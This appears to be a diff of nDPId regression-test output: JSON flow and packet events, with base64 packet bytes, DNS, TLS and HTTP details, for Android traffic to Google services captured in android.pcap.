+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871094,"flow_last_seen":1582454871094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871094,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454871094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871094,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8RuFAAEAGM+7AqAIQrcJPco\/iAFBu6HAoAAAAAKAC\/\/\/iBQAAAgQFtAQCCAr\/\/zbJAAAAAAEDAwg="} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454871100,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1582454871100,"pkt":"TGr2n\/YnxiwDYGpkCABFAABWpmUAAEARTtDAqAIBwKgCEAA1HewAQssi\/aiBgAABAAEAAAAACWRhdGFzYXZlcgpnb29nbGVhcGlzA2NvbQAAAQABwAwAAQABAAABKwAErNkVyg=="} 
00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454871100,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"datasaver.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.21.202"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871103,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871103,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ApdAAEAGssnAqAIQrNkVysrYAbsvYjRcAAAAAKAC\/\/9bhgAAAgQFtAQCCAr\/\/zbLAAAAAAEDAwg="} 
-01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871103,"flow_last_seen":1582454871103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454871103,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871103,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8ApdAAEAGssnAqAIQrNkVysrYAbsvYjRcAAAAAKAC\/\/9bhgAAAgQFtAQCCAr\/\/zbLAAAAAAEDAwg="} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871075,"flow_last_seen":1582454871103,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871103,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871042,"flow_last_seen":1582454871105,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871105,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454871115,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871115,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8q7VAAEARCZrAqAIQwKgCAZ6EADUAKMiehDwBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE="} 00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871115,"flow_last_seen":1582454871115,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1582454871115,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454871117,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454871117,"pkt":"TGr2n\/YnxiwDYGpkCABFAABM2yQAAEARGhvAqAIBwKgCEAA1noQAOIeohDyBgAABAAEAAAAAA3d3dwZnb29nbGUDY29tAAABAAHADAABAAEAAADaAATY7yZ4"} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":223,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454871117,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"www.google.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"216.239.38.120"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454871128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871128,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA83d0AAGcGtfGtwk9ywKgCEABQj+ImKPRybuhwKaAS87giVwAAAgQFlgQCCArBhO\/i\/\/82yQEDAwg="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454871130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871130,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0RuJAAEAGM\/XAqAIQrcJPco\/iAFBu6HApJij0c4AQAVdDYAAAAQEICv\/\/NtHBhO\/i"} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871094,"flow_last_seen":1582454871131,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1582454871131,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"},"http": {"hostname":"check.googlezip.net","url":"check.googlezip.net\/connect","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 9; Nokia 2.2) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/79.0.3945.93 Mobile Safari\/537.36"}} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"android.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871075,"flow_last_seen":1582454871132,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871132,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32990,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not 
Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454871132,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871132,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8KYcAAHYGldms2RXKwKgCEAG7ytjkokMBL2I0XaAS6yDzNwAAAgQFZAQCCAptKuid\/\/82ywEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454871135,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871135,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0AphAAEAGstDAqAIQrNkVysrYAbsvYjRd5KJDAoAQAVcLdwAAAQEICv\/\/NtNtKuid"} 
-01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"android.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871042,"flow_last_seen":1582454871135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871135,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32986,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871103,"flow_last_seen":1582454871138,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871138,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871152,"flow_last_seen":1582454871152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871152,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1582454871152,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871152,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA82rlAAEAGneLAqAIQ2O8meIDkAbvMauxuAAAAAKAC\/\/8TjwAAAgQFtAQCCAr\/\/zbXAAAAAAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1582454871166,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871166,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA82hIAAHUGqYnY7yZ4wKgCEAG7gOSVNE5IzGrsb6AS6yB0TQAAAgQFZAQCCArIBAje\/\/821wEDAwg="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1582454871167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871167,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA02rpAAEAGnenAqAIQ2O8meIDkAbvMauxvlTROSYAQAVeMkAAAAQEICv\/\/NtvIBAje"} -00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":250,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871103,"flow_last_seen":1582454871175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871175,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871152,"flow_last_seen":1582454871200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454871200,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871069,"flow_last_seen":1582454871207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454871207,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":260,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1598,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01154{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":261,"source":"android.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454871152,"flow_last_seen":1582454871230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2734,"flow_avg_l4_payload_len":390,"midstream":0,"thread_ts_msec":1582454871230,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","server_names":"www.google.com","ja3":"6ec2896feff5746955f700c0023f5804","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, 
CN=www.google.com","alpn":"http\/1.1","fingerprint":"32:07:6C:9F:96:7D:CE:82:15:C6:C5:7B:49:90:53:A1:CF:80:4F:B0"}} -01081{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":264,"source":"android.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871069,"flow_last_seen":1582454871237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871237,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32988,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.clients.google.com","ja3":"9c815150ea821166faecf80757d8826a","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454871128,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871128,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA83d0AAGcGtfGtwk9ywKgCEABQj+ImKPRybuhwKaAS87giVwAAAgQFlgQCCArBhO\/i\/\/82yQEDAwg="} 
